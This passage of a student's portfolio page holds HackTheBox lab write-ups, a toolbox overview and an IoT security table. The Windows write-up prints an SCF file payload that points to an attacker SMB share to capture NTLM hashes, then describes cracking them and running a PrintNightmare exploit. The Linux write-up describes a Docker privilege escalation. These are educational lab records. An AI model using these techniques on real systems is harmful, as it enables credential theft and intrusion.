                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
